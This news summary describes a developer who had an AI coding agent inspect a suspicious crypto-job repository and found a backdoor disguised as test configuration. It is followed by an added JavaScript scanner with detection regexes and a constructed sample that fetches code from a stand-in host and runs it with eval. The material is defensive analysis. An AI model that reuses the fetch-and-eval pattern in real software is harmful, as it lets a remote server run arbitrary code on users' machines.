
Developer uses AI coding agent to detect backdoor in suspicious crypto startup job offer

2h ago · 1 min read · en · News

Summary

A Python developer was contacted by a recruiter claiming to represent a crypto startup, asking for help debugging a deprecated Node module. Suspicious of the request, the developer cloned the repository on a secure VPS and used an AI coding agent (Pi running Codex) for read-only analysis. The AI flagged a file containing a backdoor disguised as test configuration that would execute arbitrary code from a remote server. The developer's caution and AI-assisted analysis prevented a potential security breach.

Key quotes

The agent flagged app/test/index.js and warned not to run the code.
The file contained a backdoor disguised as test configuration, using a server URL and a network request that executes whatever the server returns.
A recruiter claiming to represent a small crypto startup contacted a Python developer via LinkedIn to request help with nonworking proof-of-concept code and a lead engineer role.
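
The pattern the quotes describe, a server URL plus a network request whose response is executed, can be triaged from source text alone, without installing or running anything. The following is an added example, not code from the article or the repository: the indicator names, regexes, sample sources and file names are all constructed assumptions.

```javascript
// Added example: read-only triage of JavaScript source text for the pattern
// the agent flagged (remote URL + network request + execution of the reply).
// The scanned code is never imported or run; it is only read as a string.
const INDICATORS = {
  remoteUrl: /https?:\/\/[^\s'"`]+/,
  networkCall: /\b(fetch|axios|got|request|https?\.(get|request))\s*[.(]/,
  dynamicExec: /\beval\s*\(|\bFunction\s*\(|\bvm\.run\w*\s*\(|\bchild_process\b/,
  encodedBlob: /\batob\s*\(|Buffer\.from\s*\([^)]*['"]base64['"]/,
};

// Returns which indicators matched on which (1-based) lines, plus a verdict.
function scanSource(file, text) {
  const hits = {};
  text.split(/\r?\n/).forEach((line, i) => {
    for (const [name, re] of Object.entries(INDICATORS)) {
      if (re.test(line)) (hits[name] = hits[name] || []).push(i + 1);
    }
  });
  // A network call and dynamic execution in the same file is the
  // "execute whatever the server returns" shape: stop and read by hand.
  const fetchAndRun = Boolean(hits.networkCall && hits.dynamicExec);
  const verdict = fetchAndRun ? "do-not-run"
    : Object.keys(hits).length ? "review" : "clean";
  return { file, hits, verdict };
}

// Constructed sample inputs (not the contents of the file from the article).
const SAMPLE_SUSPECT = [
  "const config = { server: 'https://config.example.invalid/test' };",
  "fetch(config.server)",
  "  .then((r) => r.text())",
  "  .then((body) => eval(body));",
].join("\n");
const SAMPLE_URL_ONLY = "const docs = 'https://example.invalid/docs';";
const SAMPLE_BENIGN = [
  "const assert = require('assert');",
  "assert.strictEqual(add(2, 2), 4);",
].join("\n");

for (const [file, text] of [
  ["test/config.sample.js", SAMPLE_SUSPECT],   // hypothetical paths
  ["test/links.sample.js", SAMPLE_URL_ONLY],
  ["test/add.sample.js", SAMPLE_BENIGN],
]) {
  console.log(JSON.stringify(scanSource(file, text)));
}
```

These line-level regexes miss obfuscated or multi-file variants, so a "clean" verdict narrows where to read first and is not a reason to run the code.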
